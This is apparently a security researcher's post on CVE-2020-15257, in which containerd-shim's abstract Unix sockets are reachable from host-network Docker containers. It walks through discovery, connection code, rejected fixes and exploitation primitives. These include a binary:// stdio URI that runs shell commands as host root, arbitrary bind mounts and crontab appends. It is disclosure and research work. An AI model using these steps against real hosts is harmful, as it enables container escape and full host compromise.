[This was originally posted at https://research.nccgroup.com/2020/12/10/abstract-shimmer-cve-2020-15257-host-networking-is-root-equivalent-again/.]

This post is a technical discussion of the underlying vulnerability of CVE-2020-15257, and how it can be exploited. Our technical advisory on this issue is available here, but this post goes much further into the process that led to finding the issue, the practicalities of exploiting the vulnerability itself, various complications around fixing the issue, and some final thoughts.

Background

During an assessment a while back, I found an issue that enabled running arbitrary code in a Docker container that was running with host networking (e.g. --network=host). Normally, this is pretty bad, because with Docker's default capabilities, host networking enables listening in on all traffic and sending raw packets from arbitrary interfaces. But on the given system, there wasn't a ton of attack surface; all traffic was encrypted directly to processes without load balancers and the only interesting attack seemed to be using raw packets to handshake with Let's Encrypt and mint TLS certificates.

Sometime later, I started to think about it again and I noticed something when when running a netstat command while in a host network Docker container:

# netstat -xlp
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name     Path
...
unix  2      [ ACC ]     STREAM     LISTENING     178355   -                    /var/snap/lxd/common/lxd/unix.socket
...
unix  2      [ ACC ]     STREAM     LISTENING     21723    -                    /run/containerd/containerd.sock.ttrpc
unix  2      [ ACC ]     STREAM     LISTENING     21725    -                    /run/containerd/containerd.sock
unix  2      [ ACC ]     STREAM     LISTENING     21780    -                    /var/run/docker/metrics.sock
unix  2      [ ACC ]     STREAM     LISTENING     14309    -                    /run/systemd/journal/io.systemd.journal
unix  2      [ ACC ]     STREAM     LISTENING     23321    -                    /var/run/docker/libnetwork/496e19fa620c.sock
unix  2      [ ACC ]     STREAM     LISTENING     18640    -                    /run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     305835   -                    @/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock@
...
unix  2      [ ACC ]     STREAM     LISTENING     18645    -                    /run/docker.sock
...

As a refresher, normal Unix domain sockets are bound to a file path, but Linux supports "abstract namespace" Unix domain sockets that do not exist on the filesystem. These abstract Unix sockets are created in much the same way as normal Unix sockets, using a sockaddr_un struct:

struct sockaddr_un {
  sa_family_t sun_family;     /* AF_UNIX */
  char        sun_path[108];  /* Pathname */
};

While normal pathed Unix sockets use a sun_path containing a NUL-terminated C string, abstract Unix sockets' sun_path begins with a null byte and can contain arbitrary binary content; their length is actually based on the size passed in to the bind(2) syscall, which can be less than the size of the sockaddr_un struct. The initial null byte in an abstract Unix socket is generally represented with an @ sign when printed.

Pathed Unix domain sockets can only be connect(2)-ed to through the filesystem, and therefore host rootfs-bound pathed Unix sockets cannot generally be accessed from a container with a pivot_root(2)-ed rootfs. However, abstract namespace Unix domain sockets are tied to network namespaces.

Note: Oddly enough, even though access isn't tied to the network namespace a process is associated with, /proc/net/unix (which is what the above netstat command read from to obtain its output) lists pathed Unix sockets based on the network namespace they were bound from.

In the above netstat output, we can clearly see a bunch of pathed Unix sockets related to container runtimes, e.g. LXD, Docker, and containerd. But we also see an abstract Unix socket in the form of /containerd-shim/<id>.sock. One of these appears for each Docker container that is running on a given system.

Unlike pathed Unix sockets which have base access control checks applied based on their Unix file permissions, abstract Unix sockets have no built-in access controls, and must validate connections dynamically via pulling ancillary data with recvmsg(2) (this is also how Unix sockets can pass file descriptors between processes). So we try to connect(2) and…

# socat abstract-connect:/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock -
... socat[15] E connect(5, AF=1 "\0/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock", 89): Connection refused

"Connection refused." So my first assumption was that, whatever this thing is, it's validating incoming connections somehow. Perhaps it only accepts one connection at a time?

containerd-shim

Reading a bit about the architecture of Docker and containerd,¹ which was spun out of Docker, we find that containerd-shim is the direct parent of a container's init process. This is easily observed with the following commands run from the host:

# netstat -xlp | grep shim
unix  2      [ ACC ]     STREAM     LISTENING     348524   29533/containerd-sh  @/containerd-shim/....sock@
# pstree -Tspn 29533
systemd(1)───containerd(733)───containerd-shim(29533)───sh(29550)

So how does this thing get set up in the first place? The relevant code is part of the main containerd daemon, runtime/v1/shim/client/client.go:²

func WithStart(binary, address, daemonAddress, cgroup string, debug bool, exitHandler func()) Opt {
  return func(ctx context.Context, config shim.Config) (_ shimapi.ShimService, _ io.Closer, err error) {
    socket, err := newSocket(address)
    if err != nil {
      return nil, nil, err
    }
    defer socket.Close()
    f, err := socket.File()
    ...

    cmd, err := newCommand(binary, daemonAddress, debug, config, f, stdoutLog, stderrLog)
    if err != nil {
      return nil, nil, err
    }
    if err := cmd.Start(); err != nil {
      return nil, nil, errors.Wrapf(err, "failed to start shim")
    }
...
func newCommand(binary, daemonAddress string, debug bool, config shim.Config, socket *os.File, stdout, stderr io.Writer) (*exec.Cmd, error) {
  selfExe, err := os.Executable()
  if err != nil {
    return nil, err
  }
  args := []string{
    "-namespace", config.Namespace,
    "-workdir", config.WorkDir,
    "-address", daemonAddress,
    "-containerd-binary", selfExe,
  }

  ...

  cmd := exec.Command(binary, args...)
  ...
  cmd.ExtraFiles = append(cmd.ExtraFiles, socket)
  cmd.Env = append(os.Environ(), "GOMAXPROCS=2")
...
func newSocket(address string) (*net.UnixListener, error) {
  if len(address) > 106 {
    return nil, errors.Errorf("%q: unix socket path too long (> 106)", address)
  }
  l, err := net.Listen("unix", "\x00"+address)

In short, the functor returned from WithStart() creates an abstract Unix socket from a provided address using newSocket(). It then extracts the raw file descriptor from it and passes it directly to the child containerd-shim process it starts with newCommand(). We can confirm that this is the code creating our observed containerd-shim process by the the command line arguments and environment variables it passes to the child:

# ps -q 29533 -o command= | cat
containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/75aa678979e7f94411ab7a5e08e773fe5dff26a8852f59b3f60de48e96e32afc -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
# cat /proc/29533/environ | grep -a -E -o 'GOMAXPROCS=[0-9]+'
GOMAXPROCS=2

So what now? Well, we can confirm the behavior of the containerd-shim binary with respect to how it listens on the abstract Unix socket. The relevant code is within cmd/containerd-shim/main_unix.go:³

func serve(ctx context.Context, server *ttrpc.Server, path string) error {
  var (
    l   net.Listener
    err error
  )
  if path == "" {
    f := os.NewFile(3, "socket")
    l, err = net.FileListener(f)
    f.Close()
    path = "[inherited from parent]"
  } else {
    if len(path) > 106 {
      return errors.Errorf("%q: unix socket path too long (> 106)", path)
    }
    l, err = net.Listen("unix", "\x00"+path)
  }

Because my suspicion was that only the first connection to this socket is accepted, it would seem that there is a race condition in the above snippets whereby an attacker could list out the abstract namespace "path" before the containerd-shim process is even spawned and hammer it for connections to get the first accept(2) from containerd-shim. I then made a modified version of the code that starts containerd-shim so that it could be tested in isolation.

package main

import (
  "net"
  "io"
  "github.com/pkg/errors"
  "fmt"
  "os"
  "os/exec"
  "syscall"
)

func newSocket(address string) (*net.UnixListener, error) {
  if len(address) > 106 {
    return nil, errors.Errorf("%q: unix socket path too long (> 106)", address)
  }
  l, err := net.Listen("unix", "\x00"+address)
  if err != nil {
    return nil, errors.Wrapf(err, "failed to listen to abstract unix socket %q", address)
  }

  return l.(*net.UnixListener), nil
}

func newCommand(socket *os.File, stdout, stderr io.Writer) (*exec.Cmd, error) {
  args := []string{
    "-namespace", "moby",
    "-workdir", "/var/lib/containerd/io.containerd.runtime.v1.linux/moby/yolo",
    "-address", "/run/containerd/containerd.sock",
    "-containerd-binary", "/usr/bin/containerd",
    "-runtime-root", "/var/run/docker/runtime-runc",
    "-debug",
  }

  cmd := exec.Command("/usr/bin/containerd-shim", args...)
  cmd.Dir = "/run/containerd/io.containerd.runtime.v1.linux/moby/yolo"
  cmd.SysProcAttr = &syscall.SysProcAttr{
    Setpgid: true,
  }
  cmd.ExtraFiles = append(cmd.ExtraFiles, socket)
  cmd.Env = append(os.Environ(), "GOMAXPROCS=2")
  cmd.Stdout = stdout
  cmd.Stderr = stderr

  return cmd, nil
}

func main() {
  socket, err := newSocket("yoloshim")
  if err != nil {
    fmt.Printf("err: %s\n", err)
    return
  }
  defer socket.Close()
  f, err := socket.File()
  if err != nil {
    fmt.Printf("failed to get fd for socket\n")
    return
  }
  defer f.Close()

  stdoutLog, err := os.Create("/tmp/shim-stdout.log.txt")
  stderrLog, err := os.Create("/tmp/shim-stderr.log.txt")
  defer stdoutLog.Close()
  defer stderrLog.Close()

  cmd, err := newCommand(f, stdoutLog, stderrLog)
  if err != nil {
    fmt.Printf("err: %s\n", err)
    return
  }
  if err := cmd.Start(); err != nil {
    fmt.Printf("failed to start shim: %s\n", err)
    return
  }
  defer func() {
    if err != nil {
      cmd.Process.Kill()
    }
  }()
  go func() {
    cmd.Wait()
    if stdoutLog != nil {
      stdoutLog.Close()
    }
    if stderrLog != nil {
      stderrLog.Close()
    }
  }()
}

Separately, I also wrote some code to connect to the containerd-shim socket:

package main

import (
  "os"
  "context"
  "fmt"
  "time"
  "github.com/containerd/containerd/pkg/dialer"
  "github.com/containerd/ttrpc"
  shimapi "github.com/containerd/containerd/runtime/v1/shim/v1"
  ptypes "github.com/gogo/protobuf/types"
)

func main() {
  ctx := context.Background()

  socket := os.Args[1]
  conn, err := dialer.Dialer("\x00"+socket, 5*time.Second)
  if err != nil {
    fmt.Printf("failed to connect: %s\n", err)
    return
  }
  client := ttrpc.NewClient(conn, ttrpc.WithOnClose(func() {
    fmt.Printf("connection closed\n")
  }))
  c := shimapi.NewShimClient(client)

  var empty = &ptypes.Empty{}
  info, err := c.ShimInfo(ctx, empty)
  if err != nil {
    fmt.Printf("err: %s\n", err)
    return
  }
  fmt.Printf("info.ShimPid: %d\n", info.ShimPid)
}

So we run it and then try to connect to the containerd-shim socket we created…

# mkdir -p /run/containerd/io.containerd.runtime.v1.linux/moby/yolo
# mkdir -p /var/lib/containerd/io.containerd.runtime.v1.linux/moby/yolo/
# ./startshim
# ./connectortest yoloshim 
info.ShimPid: 12866

And that seems to work. For good measure, we'll get rid of this containerd-shim, start another one, and try socat again:

# socat ABSTRACT-CONNECT:yoloshim -                                                                                        
... socat[12890] E connect(5, AF=1 "\0yoloshim", 11): Connection refused

It fails, again. But our connection test code works:

# ./connectortest yoloshim
info.ShimPid: 13737

So what's going on? Let's see what the test code is actually doing:

# strace -e socat ABSTRACT-CONNECT:yoloshim -
...
socket(AF_UNIX, SOCK_STREAM, 0)         = 5
connect(5, {sa_family=AF_UNIX, sun_path=@"yoloshim"}, 11) = -1 ECONNREFUSED (Connection refused)
...
# strace -f -x ./connectortest yoloshim
execve("./connectortest", ["./connectortest", "yoloshim"], 0x7ffdb4ce9e98 /* 18 vars */) = 0
...
[pid 13842] socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
[pid 13842] setsockopt(3, SOL_SOCKET, SO_BROADCAST, [1], 4) = 0
[pid 13842] connect(3, {sa_family=AF_UNIX, sun_path=@"yoloshim\0"}, 12) = 0
...
[pid 13842] write(3, "\0\0\0001\0\0\0\1\1\0\n%containerd.runtime.l"..., 59) = 59
...
[pid 13844] read(3, "\0\0\0\5\0\0\0\1\2\0\22\3\10\251k", 4096) = 15
...
[pid 13842] write(1, "info.ShimPid: 13737\n", 20info.ShimPid: 13737
) = 20
[pid 13842] exit_group(0 <unfinished ...>
...
+++ exited with 0 +++

Looking closely, it appears that when the Go code connects, it embeds a null byte within the abstract Unix domain socket "path." Digging into Go's internals, it appears that Go does know how to handle abstract paths:⁴

func (sa *SockaddrUnix) sockaddr() (unsafe.Pointer, _Socklen, error) {
  name := sa.Name
  n := len(name)
  ...
  sl := _Socklen(2)
  if n > 0 {
    sl += _Socklen(n) + 1
  }
  if sa.raw.Path[0] == '@' {
    sa.raw.Path[0] = 0
    // Don't count trailing NUL for abstract address.
    sl--
  }

However, this is arguably the wrong behavior as abstract Unix sockets can start with a literal @ sign, and this implementation would prevent idiomatic Go from ever connect(2)-ing (or bind(2)-ing) to them. Regardless, because containerd embeds a raw \x00 at the start of the address, Go's internals keep the null byte at the end. If you look all the way at the top of this post, you'll see that there is, in fact, a second @ at the end of the containerd-shim socket. And I probably should have noticed it; it's definitely a bit more obvious with our test socket:

# netstat -xlp | grep yolo
unix  2      [ ACC ]     STREAM     LISTENING     93884    13737/containerd-sh  @yoloshim@

But our initial test case would have failed anyway. socat doesn't have a direct means of supporting arbitrary binary in abstract Unix domain socket "paths." You can emulate some of it with something like the following:

# socat "$(echo -en 'ABSTRACT-CONNECT:yoloshim\x01')" -
... socat[15094] E connect(5, AF=1 "\0yoloshim\x01", 12): Connection refused

But because POSIX is built around NUL-terminated C strings, the same cannot be done for null bytes, as they will fail to pass through execve(2):

# socat "$(echo -en 'ABSTRACT-CONNECT:yoloshim\x00')" -
... socat[15099] E connect(5, AF=1 "\0yoloshim", 11): Connection refused

This is actually an issue we ran into when writing unixdump, a tcpdump-alike for Unix sockets. As a workaround, we added the -@ flag⁵ that tells unixdump to parse the socket argument as base64, specifically so that null bytes and arbitrary binary could be used. Basically, this is something I definitely should have recognized the first time.

Now having a connection testing binary, we can relatively easily test if a host network namespace container can connect to our containerd-shim or a real one:

$ docker run -it --network host --userns host -v /mnt/hgfs/go/connector/connectortest:/connectortest:ro ubuntu:18.04 /bin/sh
# /connectortest yoloshim
info.ShimPid: 13737
# cat /proc/net/unix | grep shim
0000000000000000: 00000002 00000000 00010000 0001 01 93884 @yoloshim@
0000000000000000: 00000002 00000000 00010000 0001 01 114224 @/containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock@
0000000000000000: 00000003 00000000 00000000 0001 03 115132 @/containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock@
# /connectortest /containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock
info.ShimPid: 15471

And it can, and that's bad. But what is the underlying reason that we are able to connect in the first place? Looking at the containerd-shim code that starts the service, we see that it sets up a ttrpc "handshaker" with ttrpc.UnixSocketRequireSameUser():⁶

func newServer() (*ttrpc.Server, error) {
  return ttrpc.NewServer(ttrpc.WithServerHandshaker(ttrpc.UnixSocketRequireSameUser()))
}

For reference, ttrpc is containerd's custom gRPC implementation that uses a custom wire protocol not based on TLS/HTTP/H2 and focuses on supporting embedded environments. The implementation of ttrpc.UnixSocketRequireSameUser() is shown below:⁷

// UnixSocketRequireUidGid requires specific *effective* UID/GID, rather than the real UID/GID.
//
// For example, if a daemon binary is owned by the root (UID 0) with SUID bit but running as an
// unprivileged user (UID 1001), the effective UID becomes 0, and the real UID becomes 1001.
// So calling this function with uid=0 allows a connection from effective UID 0 but rejects
// a connection from effective UID 1001.
//
// See socket(7), SO_PEERCRED: "The returned credentials are those that were in effect at the time of the call to connect(2) or socketpair(2)."
func UnixSocketRequireUidGid(uid, gid int) UnixCredentialsFunc {
  return func(ucred *unix.Ucred) error {
    return requireUidGid(ucred, uid, gid)
  }
}

...

func UnixSocketRequireSameUser() UnixCredentialsFunc {
  euid, egid := os.Geteuid(), os.Getegid()
  return UnixSocketRequireUidGid(euid, egid)
}

...

func requireUidGid(ucred *unix.Ucred, uid, gid int) error {
  if (uid != -1 && uint32(uid) != ucred.Uid) || (gid != -1 && uint32(gid) != ucred.Gid) {
    return errors.Wrap(syscall.EPERM, "ttrpc: invalid credentials")
  }
  return nil
}

Essentially, the only check performed is that the user connecting is the same user as the one containerd-shim is running as. In the standard case, this is root. However, if we are assuming a standard Docker container configuration with host networking, then we can also assume that the container is not user namespaced; in fact, neither Docker, nor containerd/runc appear to support the combination of host networking with user namespaces. Essentially, because root on the inside of the container is in fact the same root user by UID outside the container, we can connect to containerd-shim, even without capabilities.

$ docker run -it --network host --userns host -v /mnt/hgfs/go/connector/connectortest:/connectortest:ro --cap-drop ALL ubuntu:18.04 /bin/sh
# /connectortest /containerd-shim/moby/419fa8aca5a8a5edbbdc5595cda9142ca487770616f5a3a2af0edc40cacadf89/shim.sock
info.ShimPid: 3278

So how bad is this actually? Pretty bad as it turns out.

The Fix

But let's take a slight segue and talk about how this issue was remediated. We first reached out to the containerd project with this advisory (also linked below). Initially, the issue was not accepted as a vulnerability because the project considered host namespacing itself to be an intractable security issue. Needless to say, I disagree with such a notion, but it was also a bit of a red herring, and after some rounds of discussion, the core issue — that containerd creates highly sensitive Unix sockets that are highly exposed — was accepted. It is worth noting that, at one point, one developer claimed that this particular issue was well known, though there does not appear to be any evidence of this being the case (at least in English); if it were, the security community would have likely jumped on the issue long ago, though the null byte quirk may have been misconstrued as an access control check.

Overall, the path to a fix winded through a couple of options before our main recommended fix, switching to pathed Unix domain sockets, was implemented. While some of these other attempts had problems that would have enabled bypasses or opened alternate avenues of attack, I think it's important to discuss what could have been and what would have gone wrong.

Note: While security practitioners reading this post may think that switching to pathed Unix domain sockets should have been so trivial as not to have required effort to be invested into the potential hardening of abstract sockets, it is worth noting that an implicit assumption of the containerd codebase was that these sockets were essentially garbage collected on container exit. Therefore, because this was not rocket science,⁸ any attempt to add pathed Unix sockets required a significant amount of cleanup code and non-trivial exit detection logic to invoke it at the right times.

LSM Policies

One of the earliest discussions was on the feasibility of applying AppArmor or SELinux policies that would prevent access to the abstract containerd sockets. While recent versions of both AppArmor and SELinux support restricting access to abstract namespace Unix domain sockets, they are not an ideal fix. As containerd itself is not generally the component within a containerization toolchain that creates such LSM policies for containers, any such attempt to use them for this purpose would have to be implemented by each client of containerd, or by end-users if they even have the privilege to reconfigure those policies — which brings a large risk of misconfiguring or accidentally eliminating the default sets of rules that help to enforce the security model of containers. Additionally, even for containerd clients such as dockerd it would be tricky to implement in a clean manner as there would be a chicken-and-egg problem with attempting to restrict access as the implementation- and version-specific scheme for containerd's internal abstract sockets would need to be hardcoded within the client's policy generator. While this could be done for Docker's native support for AppArmor,⁹ anyone attempting to use the legitimate Docker on Red Hat's distros (e.g. RHEL, CentOS, Fedora) instead of their also-ran podman would likely remain vulnerable to this issue. Red Hat's SELinux ruleset for Docker was only ever a catch-up playing imitation of the genuine AppArmor policy and it is now likely unmaintained given their shift in focus to their Docker clone.

Token Authentication

Another proposed fix was to introduce a form of authentication whereby, on connecting to the abstract socket, a client would need to provide a token value to prove its identity. However, the implementation used a single shared token value stored on disk and had no mechanism to prevent or rate-limit would-be clients from simply guessing the token value. While the initial implementation of this scheme had a timing side-channel due to a non-constant time token comparison — which could be heavily abused due to the communication occurring entirely on the same host through Unix sockets, without the overhead of the network stack — and also used a token generation scheme with slight biases, the main issues with this scheme are more operational. In addition to the fact that a protocol change such as this would potentially be so breaking as not to be backported, leaving large swathes of users exposed, it would also kick the can and create a valuable target for an attacker to obtain (i.e. the token) that could re-open the issue.

Mount Namespace Verification

One of the more interesting proposed fixes was a scheme whereby the PID of the caller could be obtained from the peer process Unix credentials of the socket accessed using getsockopt(2)'s SOL_SOCKET SO_PEERCRED option. With this PID, it would be possible to compare raw namespace ID values between the containerd-shim process on the host and the client process (e.g. via readlink /proc/<pid>/ns/mnt). While this is definitely a cool way of validating the execution context of a client, it's also extremely prone to race conditions. There is no guarantee that by the time userland code in the server calls getsockopt(2) (or in the case of a client's setsockopt(2) call with SOL_SOCKET and SO_PASSCRED, where the server receives an ancillary message each time data is sent) and processes on the Unix credential data, that the client hasn't passed the socket to a child, exited, and let another process take its PID. In fact, this is a fairly easy race to win as the client can wait or create a number of processes for PID wraparound to begin anew on the host and get close to its PID before exiting. In general, attempting to determine that the actual process connecting or sending a message to a Unix socket is the one you think it is was likely outside the threat model of SO_PEERCRED/SO_PASSCRED/SCM_CREDENTIALS, and is fraught with danger if the client has UID/GID 0 (or effective CAP_SETUID/CAP_SETGID).

Exploitation

Given that we can talk to the containerd-shim API, what does that actually get us? Going through the containerd-shim API protobuf,¹⁰ we can see an API similar to Docker:

service Shim {
  ...
  rpc Create(CreateTaskRequest) returns (CreateTaskResponse);
  rpc Start(StartRequest) returns (StartResponse);
  rpc Delete(google.protobuf.Empty) returns (DeleteResponse);
  ...
  rpc Checkpoint(CheckpointTaskRequest) returns (google.protobuf.Empty);
  rpc Kill(KillRequest) returns (google.protobuf.Empty);
  rpc Exec(ExecProcessRequest) returns (google.protobuf.Empty);
  ...
}

While a number of these APIs can do fairly damaging things, the Create() and Start() APIs are more than enough to compromise a host, but maybe not in the way you might think. Obviously, if you can start an arbitrary container config you can run the equivalent of a --privileged container, given that containerd-shim generally runs as full root. But how are you going to get such a config file and have containerd-shim load it? Let's first take a look at the CreateTaskRequest message passed to Create() and the StartRequest message passed to Start():

message CreateTaskRequest {
  string id = 1;
  string bundle = 2;
  string runtime = 3;
  repeated containerd.types.Mount rootfs = 4;
  bool terminal = 5;
  string stdin = 6;
  string stdout = 7;
  string stderr = 8;
  string checkpoint = 9;
  string parent_checkpoint = 10;
  google.protobuf.Any options = 11;
}

message StartRequest {
  string id = 1;
}

As we can see from this, the pairing of these calls is very much like docker create and docker start in that the Start() call simply starts a container configured by Create(). So what can we do with Create()? A fair amount as it turns out, but there are some restrictions. For example, at the start of Create(),¹¹ if any mounts are contained in the rootfs field, Create() will use the base filepath provided with the bundle field to create a rootfs directory. As of containerd 1.3.x, if it cannot create the directory (e.g. because it already exists) Create() will fail early.

func (s *Service) Create(ctx context.Context, r *shimapi.CreateTaskRequest) (_ *shimapi.CreateTaskResponse, err error) {
  var mounts []process.Mount
  for _, m := range r.Rootfs {
    mounts = append(mounts, process.Mount{
      Type:    m.Type,
      Source:  m.Source,
      Target:  m.Target,
      Options: m.Options,
    })
  }

  rootfs := ""
  if len(mounts) > 0 {
    rootfs = filepath.Join(r.Bundle, "rootfs")
    if err := os.Mkdir(rootfs, 0711); err != nil && !os.IsExist(err) {
      return nil, err
    }
  }
  ...

AIO (Arbitrary Command Execution IO)

The bulk of the work in Create() is handled through a call to process.Create(ctx, config). The purpose of containerd-shim here is essentially to serve as a managed layer around runc; for example, the bundle field is passed directly to runc create --bundle <bundle>, which will expect it to contain a config.json file with the container config. However, another interesting facet of this function is how it processes the stdio fields, stdin, stdout, and stderr with the createIO() function.¹²

func createIO(ctx context.Context, id string, ioUID, ioGID int, stdio stdio.Stdio) (*processIO, error) {
  pio := &processIO{
    stdio: stdio,
  }
  ...
  u, err := url.Parse(stdio.Stdout)
  if err != nil {
    return nil, errors.Wrap(err, "unable to parse stdout uri")
  }
  if u.Scheme == "" {
    u.Scheme = "fifo"
  }
  pio.uri = u
  switch u.Scheme {
  case "fifo":
    pio.copy = true
    pio.io, err = runc.NewPipeIO(ioUID, ioGID, withConditionalIO(stdio))
  case "binary":
    pio.io, err = NewBinaryIO(ctx, id, u)
  case "file":
    filePath := u.Path
    if err := os.MkdirAll(filepath.Dir(filePath), 0755); err != nil {
      return nil, err
    }
    var f *os.File
    f, err = os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
    if err != nil {
      return nil, err
    }
    f.Close()
    pio.stdio.Stdout = filePath
    pio.stdio.Stderr = filePath
    pio.copy = true
    pio.io, err = runc.NewPipeIO(ioUID, ioGID, withConditionalIO(stdio))
  ...

Since containerd 1.3.0, the containerd-shim Create() API stdio fields can be URIs that represent things like an IO processing binary that is run immediately in the context of containerd-shim, outside any form of Linux namespacing. For example, the general structure of such a URI is the following:

binary:///bin/sh?-c=cat%20/proc/self/status%20>/tmp/foobar

The only restriction is that to run a binary IO processor, the ttrpc connection must declare a containerd namespace. This is not a Linux namespace but an identifier used to help containerd to organize operations by client container runtime. One such way of passing this check is the following:

ctx := context.Background()

md := ttrpc.MD{}
md.Set("containerd-namespace-ttrpc", "notmoby")
ctx = ttrpc.WithMetadata(ctx, md)

conn, err := getSocket()
if err != nil {
  fmt.Printf("err: %s\n", err)
  return
}

client := ttrpc.NewClient(conn, ttrpc.WithOnClose(func() {
  fmt.Printf("connection closed\n")
}))
c := shimapi.NewShimClient(client)
...

However, this is not as much of an interesting payload and it also doesn't work with containerd 1.2.x, which is the version used by Docker's own packaging. Instead, the underlying stdio implementation for 1.2.x only appears to support appending to existing files. In contrast, containerd 1.3.0's file:// URIs will also create new files (and any necessary directories) if they do not exist.

Finding Yourself

To perform most of these operations, a valid bundle path must be passed to Create(). Luckily, there are two means available to us to make such a thing happen. The first is to use one's own container's ID to reference its legitimate containerd bundle path (e.g. /run/containerd/io.containerd.runtime.v1.linux/moby/<id>/config.json); the ID is available within /proc/self/cgroup.

# cat /proc/self/cgroup 
cpuset:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
pids:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
devices:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
cpu,cpuacct:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
net_cls,net_prio:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
blkio:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
freezer:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
hugetlb:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
perf_event:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
rdma:/
memory:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
name=systemd:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
:/system.slice/containerd.service

Note: The config.json file within the bundle directory will contain the host path to the container's root filesystem.

The second, which I only learned would be possible after I had written an exploit based on the first method, is to create a runc bundle configuration within your own container's filesystem; the base path for your container's filesystem on the host is available from the /etc/mtab file mounted into the container (thanks @drraid/@0x7674).

# head -n 1 /etc/mtab 
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/165536.165536/overlay2/l/EVYWL6E5PMDAS76BQVNOMGHLCA:/var/lib/docker/165536.165536/overlay2/l/WGXNHNVFLLGUXW7AWYAHAZJ3OJ:/var/lib/docker/165536.165536/overlay2/l/MC6M7WQGXRBLA5TRN5FAXRE3HH:/var/lib/docker/165536.165536/overlay2/l/XRVQ7R6RZ7XZ3C3LKQSAZDMFAO:/var/lib/docker/165536.165536/overlay2/l/VC7V4VA5MA3R4Z7ZYCHK5DVETT:/var/lib/docker/165536.165536/overlay2/l/5NBSWKYN7VDADBTD3R2LJRXH3M,upperdir=/var/lib/docker/165536.165536/overlay2/c4f65693109073085e63757644e1576e386ba0854ed1811d307cea22f9406437/diff,workdir=/var/lib/docker/165536.165536/overlay2/c4f65693109073085e63757644e1576e386ba0854ed1811d307cea22f9406437/work,xino=off 0 0

Note: The shared base directory of the upperdir and workdir paths contains a merged/ subdirectory that is the root of the container filesystem.

Mount Shenanigans (1.2.x)

So, what can we do with this? Well, with the containerd ID for our host network namespace container, we can re-Create() it from its existing config. In this situation, an interesting divergence between containerd 1.2.x and 1.3.x mentioned above is that we can't pass mounts in for containerd 1.3.x via an RPC field; however, we can do so with containerd 1.2.x. When mounts are supplied via RPC fields, they are essentially passed directly to mount(2) without validation; the only limitation is that the target is always the /run/containerd/io.containerd.runtime.v1.linux/moby/<id>/rootfs directory. Additionally, these mount(2)s are performed before any others used to build the container from the container image. However, it should be noted that standard Docker containers do not actually use the rootfs directory directly and are instead based out of directories such as /var/lib/docker/overlay2/<id>/merged. Due to this, we cannot simply bind mount(1) "/" to rootfs and expect that a reduced directory image (i.e. one without /bin) would be able to access the host filesystem. However, we can perform such a mount(2) and then bind mount(2) additional directories over that. The end result is that the subsequent binds are then applied to the host / directory itself through the mount from rootfs. However, this is an extremely dangerous operation as containerd(-shim)'s final act of running runc delete will cause the entire rootfs directory to be recursively removed. As this would now point to / on the host, this would result in the deletion of the entire filesystem. But if you would not heed the author's dire warning, the following snippets may be used to test the issue:

# mkdir -p /tmp/fakeroot/{etc,proc}
# echo "foo" > /tmp/fakeroot/etc/foo
# mkdir -p /tmp/overmount/etc
# echo "bar" > /tmp/overmount/etc/bar

_, err = c.Create(ctx, &shimapi.CreateTaskRequest{
  ID: taskId,
  Bundle: bundle,
  Terminal: false,
  Stdin:  "/dev/null",
  Stdout: "/dev/null",
  Stderr: "/dev/null",
  Rootfs: []*types.Mount{
    {
      Type: "none",
      Source: "/tmp/fakeroot",
      Options: []string{
        "rw", "bind",
      },
    },
    {
      Type: "none",
      Source: "/tmp/overmount",
      Options: []string{
        "rw", "bind",
      },
    },
  },
})

IO Shenanigans

Going back to containerd-shim's IO handling, we have a pretty clear arbitrary file read capability from pointing Stdin to any file we choose. We also have an arbitrary file write with containerd-shim's file:// URI support in 1.3.x, and an arbitrary file append in both versions. Given the append-only restriction, any append modifications to our own config.json are essentially ignored. Instead, a good target in general is /etc/crontab if the host is running cron. All you have to do is point Stdout or Stderr at it and then have your malicious container output a crontab line.

Evil Containers

Given that we can, on containerd 1.3.x, overwrite our own container's config.json and create a new container from it, or load a custom config.json from our own container's filesystem, what can we do to run a highly privileged container? First, we should talk about what this config.json file actually is. It's an OCI runtime config file¹³ that is technically supported by several implementations.

